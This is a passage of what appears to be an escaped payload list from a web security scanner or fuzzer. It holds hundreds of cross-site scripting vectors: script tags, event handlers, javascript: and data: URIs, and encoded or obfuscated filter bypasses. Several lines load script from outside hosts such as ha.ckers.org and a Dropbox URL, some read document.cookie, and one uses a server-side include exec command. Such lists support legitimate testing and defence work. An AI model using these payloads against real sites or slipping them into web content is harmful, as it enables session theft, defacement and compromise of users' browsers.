SRC=\\\"javascript:javascript:alert(1);\\\">\\r\\n<IMG DYNSRC=\\\"javascript:javascript:alert(1)\\\">\\r\\n<IMG LOWSRC=\\\"javascript:javascript:alert(1)\\\">\\r\\n<BGSOUND SRC=\\\"javascript:javascript:alert(1);\\\">\\r\\n<BR SIZE=\\\"&{javascript:alert(1)}\\\">\\r\\n<LAYER SRC=\\\"%(scriptlet)s\\\"></LAYER>\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript:javascript:alert(1);\\\">\\r\\n<STYLE>@import\\\'%(css)s\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\"Link\\\" Content=\\\"<%(css)s>; REL=stylesheet\\\">\\r\\n<XSS STYLE=\\\"behavior: url(%(htc)s);\\\">\\r\\n<STYLE>li {list-style-image: url(\\\"javascript:javascript:alert(1)\\\");}</STYLE><UL><LI>XSS\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:javascript:alert(1);\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:javascript:alert(1);\\\">\\r\\n<IFRAME SRC=\\\"javascript:javascript:alert(1);\\\"></IFRAME>\\r\\n<TABLE BACKGROUND=\\\"javascript:javascript:alert(1)\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"javascript:javascript:alert(1)\\\">\\r\\n<DIV STYLE=\\\"background-image: url(javascript:javascript:alert(1))\\\">\\r\\n<DIV STYLE=\\\"width:expression(javascript:alert(1));\\\">\\r\\n<IMG STYLE=\\\"xss:expr/*XSS*/ession(javascript:alert(1))\\\">\\r\\n<XSS STYLE=\\\"xss:expression(javascript:alert(1))\\\">\\r\\n<STYLE TYPE=\\\"text/javascript\\\">javascript:alert(1);</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\"javascript:javascript:alert(1)\\\");}</STYLE><A CLASS=XSS></A>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"javascript:javascript:alert(1)\\\")}</STYLE>\\r\\n<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->\\r\\n<BASE HREF=\\\"javascript:javascript:alert(1);//\\\">\\r\\n<OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"%(scriptlet)s\\\"></OBJECT>\\r\\n<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>\\r\\n<HTML xmlns:xss><?import namespace=\\\"xss\\\" implementation=\\\"%(htc)s\\\"><xss:xss>XSS</xss:xss></HTML>\\\"\\\"\\\",\\\"XML namespace.\\\"),(\\\"\\\"\\\"<XML ID=\\\"xss\\\"><I><B>&lt;IMG SRC=\\\"javas<!-- -->cript:javascript:alert(1)\\\"&gt;</B></I></XML><SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"></SPAN>\\r\\n<HTML><BODY><?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"><?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"><t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;\\\"></BODY></HTML>\\r\\n<SCRIPT SRC=\\\"%(jpg)s\\\"></SCRIPT>\\r\\n<HEAD><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-\\r\\n<form id=\\\"test\\\" /><button form=\\\"test\\\" formaction=\\\"javascript:javascript:alert(1)\\\">X\\r\\n<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>\\r\\n<P STYLE=\\\"behavior:url(\\\'#default#time2\\\')\\\" end=\\\"0\\\" onEnd=\\\"javascript:alert(1)\\\">\\r\\n<STYLE>@import\\\'%(css)s\\\';</STYLE>\\r\\n<STYLE>a{background:url(\\\'s1\\\' \\\'s2)}@import javascript:javascript:alert(1);\\\');}</STYLE>\\r\\n<meta charset= \\\"x-imap4-modified-utf7\\\"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>\\r\\n<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>\\r\\n<style onreadystatechange=javascript:javascript:alert(1);></style>\\r\\n<?xml version=\\\"1.0\\\"?><html:html xmlns:html=\\\'http://www.w3.org/1999/xhtml\\\'><html:script>javascript:alert(1);</html:script></html:html>\\r\\n<embed code=%(scriptlet)s></embed>\\r\\n<embed code=javascript:javascript:alert(1);></embed>\\r\\n<embed src=%(jscript)s></embed>\\r\\n<frameset onload=javascript:javascript:alert(1)></frameset>\\r\\n<object onerror=javascript:javascript:alert(1)>\\r\\n<embed type=\\\"image\\\" src=%(scriptlet)s></embed>\\r\\n<XML ID=I><X><C><![CDATA[<IMG SRC=\\\"javas]]<![CDATA[cript:javascript:alert(1);\\\">]]</C><X></xml>\\r\\n<IMG SRC=&{javascript:alert(1);};>\\r\\n<a href=\\\"jav&#65ascript:javascript:alert(1)\\\">test1</a>\\r\\n<a href=\\\"jav&#97ascript:javascript:alert(1)\\\">test1</a>\\r\\n<embed width=500 height=500 code=\\\"data:text/html,<script>%(payload)s</script>\\\"></embed>\\r\\n<iframe srcdoc=\\\"&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>\\\">\\r\\n\\\';alert(String.fromCharCode(88,83,83))//\\\';alert(String.fromCharCode(88,83,83))//\\\";\\r\\nalert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\\r\\n></SCRIPT>\\\">\\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=JaVaScRiPt:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=javascript:alert(\\\"XSS\\\")>\\r\\n<IMG SRC=`javascript:alert(\\\"RSnake says, \\\'XSS\\\'\\\")`>\\r\\n<a onmouseover=\\\"alert(document.cookie)\\\">xxs link</a>\\r\\n<a onmouseover=alert(document.cookie)>xxs link</a>\\r\\n<IMG \\\"\\\"\\\"><SCRIPT>alert(\\\"XSS\\\")</SCRIPT>\\\">\\r\\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\\r\\n<IMG SRC=# onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC= onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG onmouseover=\\\"alert(\\\'xxs\\\')\\\">\\r\\n<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\\r\\n<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\\r\\n<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\\r\\n<IMG SRC=\\\"jav ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x09;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0A;ascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=\\\"jav&#x0D;ascript:alert(\\\'XSS\\\');\\\">\\r\\nperl -e \\\'print \\\"<IMG SRC=java\\\\0script:alert(\\\\\\\"XSS\\\\\\\")>\\\";\\\' > out\\r\\n<IMG SRC=\\\" &#14; javascript:alert(\\\'XSS\\\');\\\">\\r\\n<SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<BODY onload!#$%&()*~+-_.,:;?@[/|\\\\]^`=alert(\\\"XSS\\\")>\\r\\n<SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<<SCRIPT>alert(\\\"XSS\\\");//<</SCRIPT>\\r\\n<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\\r\\n<SCRIPT SRC=//ha.ckers.org/.j>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\')\\\"\\r\\n<iframe src=http://ha.ckers.org/scriptlet.html <\\r\\n\\\\\\\";alert(\\\'XSS\\\');//\\r\\n</TITLE><SCRIPT>alert(\\\"XSS\\\");</SCRIPT>\\r\\n<INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<BODY BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG DYNSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<IMG LOWSRC=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<STYLE>li {list-style-image: url(\\\"javascript:alert(\\\'XSS\\\')\\\");}</STYLE><UL><LI>XSS</br>\\r\\n<IMG SRC=\\\'vbscript:msgbox(\\\"XSS\\\")\\\'>\\r\\n<IMG SRC=\\\"livescript:[code]\\\">\\r\\n<BODY ONLOAD=alert(\\\'XSS\\\')>\\r\\n<BGSOUND SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<BR SIZE=\\\"&{alert(\\\'XSS\\\')}\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\">\\r\\n<STYLE>@import\\\'http://ha.ckers.org/xss.css\\\';</STYLE>\\r\\n<META HTTP-EQUIV=\\\"Link\\\" Content=\\\"<http://ha.ckers.org/xss.css>; REL=stylesheet\\\">\\r\\n<STYLE>BODY{-moz-binding:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}</STYLE>\\r\\n<STYLE>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\"XSS\\\")\\\';</STYLE>\\r\\n<IMG STYLE=\\\"xss:expr/*XSS*/ession(alert(\\\'XSS\\\'))\\\">\\r\\nexp/*<A STYLE=\\\'no\\\\xss:noxss(\\\"*//*\\\");xss:ex/*XSS*//*/*/pression(alert(\\\"XSS\\\"))\\\'>\\r\\n<STYLE TYPE=\\\"text/javascript\\\">alert(\\\'XSS\\\');</STYLE>\\r\\n<STYLE>.XSS{background-image:url(\\\"javascript:alert(\\\'XSS\\\')\\\");}</STYLE><A CLASS=XSS></A>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"javascript:alert(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<STYLE type=\\\"text/css\\\">BODY{background:url(\\\"javascript:alert(\\\'XSS\\\')\\\")}</STYLE>\\r\\n<XSS STYLE=\\\"xss:expression(alert(\\\'XSS\\\'))\\\">\\r\\n<XSS STYLE=\\\"behavior: url(xss.htc);\\\">\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert(\\\'XSS\\\');\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\">\\r\\n<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IFRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></IFRAME>\\r\\n<IFRAME SRC=# onmouseover=\\\"alert(document.cookie)\\\"></IFRAME>\\r\\n<FRAMESET><FRAME SRC=\\\"javascript:alert(\\\'XSS\\\');\\\"></FRAMESET>\\r\\n<TABLE BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<TABLE><TD BACKGROUND=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<DIV STYLE=\\\"background-image: url(javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\'\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\'\\\\0029\\\">\\r\\n<DIV STYLE=\\\"background-image: url(&#1;javascript:alert(\\\'XSS\\\'))\\\">\\r\\n<DIV STYLE=\\\"width: expression(alert(\\\'XSS\\\'));\\\">\\r\\n<BASE HREF=\\\"javascript:alert(\\\'XSS\\\');//\\\">\\r\\n <OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http://ha.ckers.org/scriptlet.html\\\"></OBJECT>\\r\\n<EMBED SRC=\\\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"></EMBED>\\r\\n<SCRIPT SRC=\\\"http://ha.ckers.org/xss.jpg\\\"></SCRIPT>\\r\\n<!--#exec cmd=\\\"/bin/echo \\\'<SCR\\\'\\\"--><!--#exec cmd=\\\"/bin/echo \\\'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\\\'\\\"-->\\r\\n<? echo(\\\'<SCR)\\\';echo(\\\'IPT>alert(\\\"XSS\\\")</SCRIPT>\\\'); ?>\\r\\n<IMG SRC=\\\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\\\">\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser\\r\\n<META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=<SCRIPT>alert(\\\'XSS\\\')</SCRIPT>\\\">\\r\\n <HEAD><META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"> </HEAD>+ADw-SCRIPT+AD4-alert(\\\'XSS\\\');+ADw-/SCRIPT+AD4-\\r\\n<SCRIPT a=\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT =\\\">\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\" \\\'\\\' SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT \\\"a=\\\'>\\\'\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=`>` SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT a=\\\">\\\'>\\\" SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<SCRIPT>document.write(\\\"<SCRI\\\");</SCRIPT>PT SRC=\\\"http://ha.ckers.org/xss.js\\\"></SCRIPT>\\r\\n<A HREF=\\\"http://66.102.7.147/\\\">XSS</A>\\r\\n<A HREF=\\\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\">XSS</A>\\r\\n<A HREF=\\\"http://1113982867/\\\">XSS</A>\\r\\n<A HREF=\\\"http://0x42.0x0000066.0x7.0x93/\\\">XSS</A>\\r\\n<A HREF=\\\"http://0102.0146.0007.00000223/\\\">XSS</A>\\r\\n<A HREF=\\\"htt p://6 6.000146.0x7.147/\\\">XSS</A>\\r\\n<iframe src=\\\"&Tab;javascript:prompt(1)&Tab;\\\">\\r\\n<svg><style>{font-family&colon;\\\'<iframe/onload=confirm(1)>\\\'\\r\\n<input/onmouseover=\\\"javaSCRIPT&colon;confirm&lpar;1&rpar;\\\"\\r\\n<sVg><scRipt >alert&lpar;1&rpar; {Opera}\\r\\n<img/src=`` onerror=this.onerror=confirm(1) \\r\\n<form><isindex formaction=\\\"javascript&colon;confirm(1)\\\"\\r\\n<img src=``&NewLine; onerror=alert(1)&NewLine;\\r\\n<script/&Tab; src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' /&Tab;></script>\\r\\n<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\\r\\n<iframe/src=\\\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\">\\r\\n<script /**/>/**/alert(1)/**/</script /**/\\r\\n&#34;&#62;<h1/onmouseover=\\\'\\\\u0061lert(1)\\\'>\\r\\n<iframe/src=\\\"data:text/html,<svg &#111;&#110;load=alert(1)>\\\">\\r\\n<meta content=\\\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\\\" http-equiv=\\\"refresh\\\"/>\\r\\n<svg><script xlink:href=data&colon;,window.open(\\\'https://www.google.com/\\\')></script\\r\\n<svg><script x:href=\\\'https://dl.dropbox.com/u/13018058/js.js\\\' {Opera}\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;url=javascript:confirm(1)\\\">\\r\\n<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\\r\\n<form><a href=\\\"javascript:\\\\u0061lert&#x28;1&#x29;\\\">X\\r\\n</script><img/*/src=\\\"worksinchrome&colon;prompt&#x28;1&#x29;\\\"/*/onerror=\\\'eval(src)\\\'>\\r\\n<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\\r\\n<form><iframe &#09;&#10;&#11; src=\\\"javascript&#58;alert(1)\\\"&#11;&#10;&#09;;>\\r\\n<a href=\\\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&#09;&#10;&#11;>X</a\\r\\nhttp://www.google<script .com>alert(document.location)</script\\r\\n<a&#32;href&#61;&#91;&#00;&#93;\\\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\\\">XYZ</a\\r\\n<img/src=@&#32;&#13; onerror = prompt(\\\'&#49;\\\')\\r\\n<style/onload=prompt&#40;\\\'&#88;&#83;&#83;\\\'&#41;\\r\\n<script ^__^>alert(String.fromCharCode(49))</script ^__^\\r\\n</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\\r\\n&#00;</form><input type&#61;\\\"date\\\" onfocus=\\\"alert(1)\\\">\\r\\n<form><textarea &#13; onkeyup=\\\'\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&#x28;1&#x29;\\\'>\\r\\n<script /***/>/***/confirm(\\\'\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\')/***/</script /***/\\r\\n<iframe srcdoc=\\\'&lt;body onload=prompt&lpar;1&rpar;&gt;\\\'>\\r\\n<a href=\\\"javascript:void(0)\\\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\\r\\n<script ~~~>alert(0%0)</script ~~~>\\r\\n<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\\r\\n<///style///><span %2F onmousemove=\\\'alert&lpar;1&rpar;\\\'>SPAN\\r\\n<img/src=\\\'http://i.imgur.com/P8mL8.jpg\\\' onmouseover=&Tab;prompt(1)\\r\\n&#34;&#62;<svg><style>{-o-link-source&colon;\\\'<body/onload=confirm(1)>\\\'\\r\\n&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\\r\\n<marquee onstart=\\\'javascript:alert&#x28;1&#x29;\\\'>^__^\\r\\n<div/style=\\\"width:expression(confirm(1))\\\">X</div> {IE7}\\r\\n<iframe// src=javaSCRIPT&colon;alert(1)\\r\\n//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type=\\\'submit\\\'>//\\r\\n/*iframe/src*/<iframe/src=\\\"<iframe/src=@\\\"/onload=prompt(1) /*iframe/src*/>\\r\\n//|\\\\\\\\ <script //|\\\\\\\\ src=\\\'https://dl.dropbox.com/u/13018058/js.js\\\'> //|\\\\\\\\ </script //|\\\\\\\\\\r\\n</font>/<svg><style>{src&#x3A;\\\'<style/onload=this.onload=confirm(1)>\\\'</font>/</style>\\r\\n<a/href=\\\"javascript:&#13; javascript:prompt(1)\\\"><input type=\\\"X\\\">\\r\\n</plaintext\\\\></|\\\\><plaintext/onmouseover=prompt(1)\\r\\n</svg>\\\'\\\'<svg><script \\\'AQuickBrownFoxJumpsOverTheLazyDog\\\'>alert&#x28;1&#x29; {Opera}\\r\\n<a href=\\\"javascript&colon;\\\\u0061&#x6C;&#101%72t&lpar;1&rpar;\\\"><button>\\r\\n<div onmouseover=\\\'alert&lpar;1&rpar;\\\'>DIV</div>\\r\\n<iframe style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\">\\r\\n<a href=\\\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\\\">X</a>\\r\\n<embed src=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<object data=\\\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\">\\r\\n<var onmouseover=\\\"prompt(1)\\\">On Mouse Over</var>\\r\\n<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\\r\\n<img src=\\\"/\\\" =_=\\\" title=\\\"onerror=\\\'prompt(1)\\\'\\\">\\r\\n<%<!--\\\'%><script>alert(1);</script -->\\r\\n<script src=\\\"data:text/javascript,alert(1)\\\"></script>\\r\\n<iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n<iframe/onreadystatechange=alert(1)\\r\\n<svg/onload=alert(1)\\r\\n<input value=<><iframe/src=javascript:confirm(1)\\r\\n<input type=\\\"text\\\" value=`` <div/onmouseover=\\\'alert(1)\\\'>X</div>\\r\\n<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\\r\\n<img src=`xx:xx`onerror=alert(1)>\\r\\n<object type=\\\"text/x-scriptlet\\\" data=\\\"http://jsfiddle.net/XLE63/ \\\"></object>\\r\\n<meta http-equiv=\\\"refresh\\\" content=\\\"0;javascript&colon;alert(1)\\\"/>\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<embed code=\\\"http://businessinfo.co.uk/labs/xss/xss.swf\\\" allowscriptaccess=always>\\r\\n<svg contentScriptType=text/vbs><script>MsgBox+1\\r\\n<a href=\\\"data:text/html;base64_,<svg/onload=\\\\u0061&#x6C;&#101%72t(1)>\\\">X</a\\r\\n<iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\'\\\\u0061\\\') worksinIE>\\r\\n<script>~\\\'\\\\u0061\\\' ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\'\\\\u0061\\\')</script U+\\r\\n<script/src=\\\"data&colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\'\\\\u0061\\\')\\\"></script a=\\\\u0061 & /=%2F\\r\\n<script/src=data&colon;text/j\\\\u0061v\\\\u0061&#115&#99&#114&#105&#112&#116,\\\\u0061%6C%65%72%74(/XSS/)></script\\r\\n<object data=javascript&colon;\\\\u0061&#x6C;&#101%72t(1)>\\r\\n<script>+-+-1-+-+alert(1)</script>\\r\\n<body/onload=&lt;!--&gt;&#10alert(1)>\\r\\n<script itworksinallbrowsers>/*<script* */alert(1)</script\\r\\n<img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n<svg><script>//&NewLine;confirm(1);</script </svg>\\r\\n<svg><script onlypossibleinopera:-)> alert(1)\\r\\n<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\\r\\n<script x> alert(1) </script 1=2\\r\\n<div/onmouseover=\\\'alert(1)\\\'> style=\\\"x:\\\">\\r\\n<--`<img/src=` onerror=alert(1)> --!>\\r\\n<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\\r\\n<div style=\\\"position:absolute;top:0;left:0;width:100%;height:100%\\\" onmouseover=\\\"prompt(1)\\\" onclick=\\\"alert(1)\\\">x</button>\\r\\n\\\"><img src=x onerror=window.open(\\\'https://www.google.com/\\\');>\\r\\n<form><button formaction=javascript&colon;alert(1)>CLICKME\\r\\n<math><a xlink:href=\\\"//jsfiddle.net/t846h/\\\">click\\r\\n<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\\r\\n<iframe src=\\\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\"></iframe>\\r\\n<a href=\\\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\\\">Click Me</a>\\r\\n\\\'\\\';!--\\\"<XSS>=&{()}\\r\\n\\\'>//\\\\\\\\,<\\\'>\\\">\\\">\\\"*\\\"\\r\\n\\\'); alert(\\\'XSS\\r\\n<script>alert(1);</script>\\r\\n<script>alert(\\\'XSS\\\');</script>\\r\\n<IMG SRC=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=javascript:alert(\\\'XSS\\\')>\\r\\n<IMG SRC=javascript:alert(&quot;XSS&quot;)>\\r\\n<IMG \\\"\\\"\\\"><SCRIPT>alert(\\\"XSS\\\")</SCRIPT>\\\">\\r\\n<scr<script>ipt>alert(\\\'XSS\\\');</scr</script>ipt>\\r\\n<script>alert(String.fromCharCode(88,83,83))</script> \\r\\n<img src=foo.png onerror=alert(/xssed/) />\\r\\n<style>@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert(\\\\\\\"XSS\\\\\\\")\\\';</style>\\r\\n<? echo(\\\'<scr)\\\'; echo(\\\'ipt>alert(\\\\\\\"XSS\\\\\\\")</script>\\\'); ?>\\r\\n<marquee><script>alert(\\\'XSS\\\')</script></marquee>\\r\\n<IMG SRC=\\\\\\\"jav&#x09;ascript:alert(\\\'XSS\\\');\\\\\\\">\\r\\n<IMG SRC=\\\\\\\"jav&#x0A;ascript:alert(\\\'XSS\\\');\\\\\\\">\\r\\n<IMG SRC=\\\\\\\"jav&#x0D;ascript:alert(\\\'XSS\\\');\\\\\\\">\\r\\n<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\\r\\n\\\"><script>alert(0)</script>\\r\\n<script src=http://yoursite.com/your_files.js></script>\\r\\n</title><script>alert(/xss/)</script>\\r\\n</textarea><script>alert(/xss/)</script>\\r\\n<IMG LOWSRC=\\\\\\\"javascript:alert(\\\'XSS\\\')\\\\\\\">\\r\\n<IMG DYNSRC=\\\\\\\"javascript:alert(\\\'XSS\\\')\\\\\\\">\\r\\n<font style=\\\'color:expression(alert(document.cookie))\\\'>\\r\\n<img src=\\\"javascript:alert(\\\'XSS\\\')\\\">\\r\\n<script language=\\\"JavaScript\\\">alert(\\\'XSS\\\')</script>\\r\\n<body onunload=\\\"javascript:alert(\\\'XSS\\\');\\\">\\r\\n<body onLoad=\\\"alert(\\\'XSS\\\');\\\"\\r\\n[color=red\\\' onmouseover=\\\"alert(\\\'xss\\\')\\\"]mouse over[/color]\\r\\n\\\"/></a></><img src=1.gif onerror=alert(1)>\\r\\nwindow.alert(\\\"Bonjour !\\\");\\r\\n<div style=\\\"x:expression((window.r==1)?\\\'\\\':eval(\\\'r=1;\\r\\nalert(String.fromCharCode(88,83,83));\\\'))\\\">\\r\\n<iframe<?php echo chr(11)?> onload=alert(\\\'XSS\\\')></iframe>\\r\\n\\\"><script 